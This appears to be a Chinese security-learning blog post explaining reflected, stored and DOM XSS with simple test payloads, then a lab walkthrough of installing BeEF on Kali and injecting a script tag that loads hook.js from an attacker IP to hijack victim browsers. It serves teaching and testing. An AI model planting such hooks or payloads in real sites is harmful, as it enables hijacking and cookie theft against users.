24_XSS跨站脚本攻击-学习与测试/Beef工具使用/Beef-xss攻击实战

XSS(跨站脚本)概述

Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:
    1.反射性XSS;
    2.存储型XSS;
    3.DOM型XSS;
XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。
XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。
因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:
  输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;
  输出转义:根据输出点的位置对输出到前端的内容进行适当转义;

http://www.owasp.org.cn/OWASP-CHINA/

http://www.owasp.org.cn/OWASP-CHINA/owasp-project/2021-owasp-top-10/

http://www.owasp.org.cn/OWASP-CHINA/owasp-project/OWASP-TOP10-2021中文版V1.0发布.pdf

 每四年更新一次,下次是2025年

XSS跨站脚本攻击

反射型XSS(get)

有服务器参与,但是不会存储。

<h1>123</h1>

<script>alert(1);</script>

既然放到了这个位置,那搞点代码试试放进去,会发现前端限制了字数的限制,输不动了

点确定,既存在反射性XSS,

模拟别的用户打开,用的别的浏览器打开。因为请求里包含了JS代码。这种为反射型get方式提交的,利用起来很方便,就是把链接给别人。服务器相当于一面镜子

反射型XSS(post)

常见于 留言板、评论之类的地方

用一个获取cookie的技巧拿到信息,火狐浏览器

<script>alert(document.cookie);</script>

DOM型XSS

没有服务器从参与,对DOM进行操作。

思路跟SQL注入差不多,把前面的闭合,这里用了调用函数,操作是临时的并不会保存到服务器里面,危害不大,并没有服务器参与

  • onclick:这是一个事件处理器的名称,表示当元素被点击时触发的事件。
  • alert(1):这是一个JavaScript函数调用,它会弹出一个包含数字"1"的警告框。
' onclick='alert(1)

存储型XSS

  • 插入的代码会保存在服务器,会永久存在

 <script>alert(1);</script>

 保存后就存在服务器里了,换浏览器访问此页面也会被执行

因此存储型XSS的危害比较大

另外,有数据库的参与都有可能有SQL注入,可以测试一下

Beef-xss攻击实战

正常情况下用<script>alert(1);</script>去测试看有没有弹窗,如果有,表示有漏洞,则可以换上工具

beff介绍

打开kail,输一下命令,如果没有就安装一下

┌──(root㉿kali)-[~/桌面]
└─# vim  /etc/apt/sources.list   // 编辑软件源配置文件

# 阿里云镜像源
deb https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib

# 华为云镜像源
deb https://repo.huaweicloud.com/kali kali-rolling main non-free contrib
deb-src https://repo.huaweicloud.com/kali kali-rolling main non-free contrib

 删掉kail里自带的默认的全部,然后保存阿里的源,一般装一个阿里云的就够了,不然更新多了要等久

┌──(root㉿kali)-[~/桌面]
└─# apt-get clean    // 清除缓存

┌──(root㉿kali)-[~/桌面]
└─# apt-get update   // 更新软件源

安装beef-xss

┌──(root㉿kali)-[~/桌面]
└─# apt-get -y install beef-xss  

运行beef-xss

┌──(root㉿kali)-[~/桌面]
└─# beef-xss

访问beef-xss

如果忘记密码,可修改配置文件

┌──(root㉿kali)-[~/桌面]
└─# vim   /etc/beef-xss/config.yaml

┌──(root㉿kali)-[~/桌面]
└─# systemctl stop beef-xss  // 关闭

┌──(root㉿kali)-[~/桌面]
└─# systemctl start beef-xss  // 启动

<script src="http://192.168.10.132:3000/hook.js"></script>

换成自己kail的IP地址

浏览器劫持

执行一下会发现跳到百度了

社工弹窗

点击执行

受害者浏览器

beef

beef放功wang上的话。。额

XSS攻击的防御

与SQL注入的防御类似,对<>类似这样的特殊字符进行转义

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值